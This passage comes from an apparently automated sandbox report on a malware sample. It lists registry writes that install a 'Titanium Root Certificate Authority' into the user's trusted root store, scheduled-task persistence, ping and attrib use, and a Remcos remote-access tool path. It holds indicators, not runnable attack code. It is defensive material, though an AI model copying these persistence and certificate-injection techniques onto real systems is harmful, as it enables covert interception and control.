f8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380042003400410037003400340045002d0033003400340044002d0034004400440031002d0038004300430031002d003200330032004300430039004600370034004500410046007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380038003700450038003400360044002d0036004200440039002d0034003100440033002d0038003200390042002d004500420044003000300045003700320035003600420034007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380030004600390044003800310033002d0030004600460036002d0034003000340032002d0039003100360046002d003100390034004300340036003900360043004300420034007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00330045003700370034004400380036002d0045003900330033002d0034004400370037002d0041003500360043002d004100300039004300390041004500350036004500330035007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380038003700450038003400360044002d0036004200440039002d0034003100440033002d0038003200390042002d004500420044003000300045003700320035003600420034007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00330045003700370034004400380036002d0045003900330033002d0034004400370037002d0041003500360043002d004100300039004300390041004500350036004500330035007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340030003900380043004100410032002d0042004600420031002d0034004400360032002d0038003900350043002d004600410031003700300036004200410042003300460037007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380034004300360039003200390045002d0044003100450043002d0034004500310043002d0038003700460035002d003100330034003000440044003200460035004500390036007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\srtware.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
